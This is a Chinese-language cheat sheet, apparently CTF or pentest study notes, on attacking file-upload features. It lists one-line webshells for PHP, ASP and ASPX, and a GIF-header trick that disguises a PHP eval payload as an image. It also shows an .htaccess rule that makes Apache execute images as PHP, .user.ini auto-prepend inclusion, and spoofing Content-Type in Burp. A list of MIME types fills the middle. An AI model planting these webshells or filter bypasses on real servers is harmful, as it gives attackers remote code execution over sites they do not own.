文件上传

一句话木马：上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限

php一句话木马：  <?php @eval($_POST[value]); ?>
asp一句话木马：  <%eval request ("value")%> 或  <% execute(request("value")) %>   
aspx一句话木马： <%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>

 

index是普遍意义上的“首页”，也就是输入一个域名后会打开一个页面

基本上就是index.xxxx（基本上首页都不会把index.xxxx显示在url里，但也不绝对）

默认首页就是index.php  不知道干啥的时候可以试试

 

 

 

 

图片文件上传

GIF文件头：GIF89a? <script language="php">eval($_REQUEST[value])</script>      <<=当"<?"被过滤时，无法使用php一句话木马，可以用此语句来绕过过滤

phtml ：php网页的后缀名，常见的还有php、php3

 

.htaccess：

.htaccess文件,将test.png当成php解析  先传.htaccess再传带有木马的.png文件  仅限服务器是apache不是nginx时使用

记得burp抓包修改文件类型，conten—type：image/jpeg

（

text/html ：HTML格式
text/plain ：纯文本格式
text/xml ：XML格式

image/gif ：gif图片格式
image/jpeg ：jpg图片格式
image/png ：png图片格式

application/xml ： XML数据格式
application/json ： JSON数据格式
application/pdf ： pdf格式
application/msword ： Word文档格式
application/octet-stream ： 二进制流数据（如文件下载）

application/x-www-form-urlencoded ：

<form encType="">中默认的encType，
form表单数据被编码为key/value格式发送到服务器（表单默认的提交数据的格式）。
服务器收到的raw body会是，name=aaa&key=bbb。

multipart/form-data ： 表单上传文件

）

<FilesMatch "\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

 

.user.ini：

auto_prepend_file = <filename> //包含在文件头
auto_append_file = <filename> //包含在文件尾

写其中一句即可包含所要上传的文件